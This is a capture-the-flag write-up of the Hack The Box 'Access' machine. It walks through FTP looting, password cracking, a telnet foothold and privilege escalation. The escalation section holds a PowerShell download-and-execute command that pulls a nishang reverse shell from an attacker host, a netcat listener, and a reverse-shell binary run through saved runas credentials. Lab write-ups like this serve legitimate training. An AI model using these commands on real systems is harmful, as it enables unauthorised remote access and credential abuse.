# RECON
## NMAP
```txt
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
| ftp-syst: 
|_  SYST: Windows_NT
23/tcp open  telnet  Microsoft Windows XP telnetd (no more connections allowed)
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-title: MegaCorp
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
```

## FTP
- Found 2 files, `Access Control.zip` and `backup.mdb`
- Attempting to unzip the fail failed.
`unsupported compression method 99`
- Looking online , it says the zip is password protected and `unzip` doesn't support passwords.
- We can use 7zip but we need to crack the password.
- We can use zip2john to try and crack it.
- The `.mdb` file is a Microsoft Access Database file.
- The file is corrupted since we didn't transfer it correctly from FTP
```sh
WARNING! 5849 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
ftp> binary
200 Type set to I.
ftp> get backup.mdb
local: backup.mdb remote: backup.mdb
200 PORT command successful.
150 Opening BINARY mode data connection.
100% |*************************************************************************************************************************************************************************************************|  5520 KiB    1.90 MiB/s    00:00 ETA
226 Transfer complete.
5652480 bytes received in 00:02 (1.87 MiB/s)
```
- Use mode `binary`.
- Now we can open it in and online viewer like [mdbopener](mdbopener.com)
- Now we can inspect each table, a particular interesting one was `auth_user` which contained usernames and passwords
```txt
engineer:access4u@security
admin:admin
backup_admin:admin
```
- We can now extract the `zip` file using the password `access4u@security`. 
- The zip contains `Access control.pst` which is Microsoft Outlook email folder.
- In Linux, we can use `readpst` to read the file.
- Using that command, we now get `Access Control.mbox` where we can read it with an text editor.
```txt
The password for the “security” account has been changed to 4Cc3ssC0ntr0ller.  Please ensure this is passed on to your engineers.
```
- Possible credential?
`security:4Cc3ssC0ntr0ller`
## Web
- Nothing interesting but is an IIS server.
- Run GoBuster.

# Foothold
- Nothing to authenticate on Web which means it is FTP.
```sh
┌──(user㉿kali)-[~/ctf/access]
└─$ telnet 10.10.10.98 -l security                                                                                                                                                                                                        1 ⨯
Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.
Welcome to Microsoft Telnet Service 

password: 

*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>ls
'ls' is not recognized as an internal or external command,
operable program or batch file.

C:\Users\security>whaooami
'whaooami' is not recognized as an internal or external command,
operable program or batch file.

C:\Users\security>whoami
access\security
```

# Post-exploit
- Netcat is blocked by group policy.
- Found `ZKTeco` in root directory but nothing interesting in files and no exploits.
- Found a shortcut at public.
```sh
C:\Users\Public\Desktop>type "ZKAccess3.5 Security System.lnk"
LF@ 7#P/PO :+00/C:\R1M:Windows:M:*wWindowsV1MVSystem32:MV*System32X2P:
                                                                       runas.exe:1:1*Yrunas.exeL-KEC:\Windows\System32\runas.exe#..\..\..\Windows\System32\runas.exeC:\ZKTeco\ZKAccess3.5G/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"'C:\ZKTeco\ZKAccess3.5\img\AccessNET.ico%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico%
                                                                                                                                                                wN]ND.Q`Xaccess_8{E3
                                                                                                                                                                                    Oj)H
                                                                                                                                                                                        )ΰ[_8{E3
                                                                                                                                                                                                Oj)H
                                                                                                                                                                                                    )ΰ[ 1SPSXFL8C&me*S-1-5-21-953262931-566350628-63446256-500

```
- We see that it's saving the creds at `/savecred`
- We can use this command to list if its still being saved.
```sh
cmdkey /list
Currently stored credentials:

    Target: Domain:interactive=ACCESS\Administrator
                                                       Type: Domain Password
    User: ACCESS\Administrator

```
- The server also blocks execution of scripts.

## Privilege Escalation
- `runas` is equivalent of `sudo` but it will create a new window of the escalated shell instead of elevating the current one.
- Use a shell from nishang or msfvenom.
- Upload and serve using the telnet client.
```sh
C:\Users\security>runas /user:ACCESS\Administrator /savecred "powershell iex(new-object net.webclient).downloadstring('http://10.10.17.239:8000/Invoke-PowerShellTcp.ps1')"

┌──(user㉿kali)-[/opt/nishang/Shells]                                                                                  
└─$ rlwrap nc -lvnp 443                                                                                         130 ⨯
listening on [any] 443 ...                                                                                             
connect to [10.10.17.239] from (UNKNOWN) [10.10.10.98] 49163                    
Windows PowerShell running as user Administrator on ACCESS                                                             
Copyright (C) 2015 Microsoft Corporation. All rights reserved. 
```
- Another way we could do this is creating a reverse shell binary and running it as the user.
```sh
C:\Users\security>runas /user:ACCESS\Administrator /savecred" C:\users\security\lol.exe"
```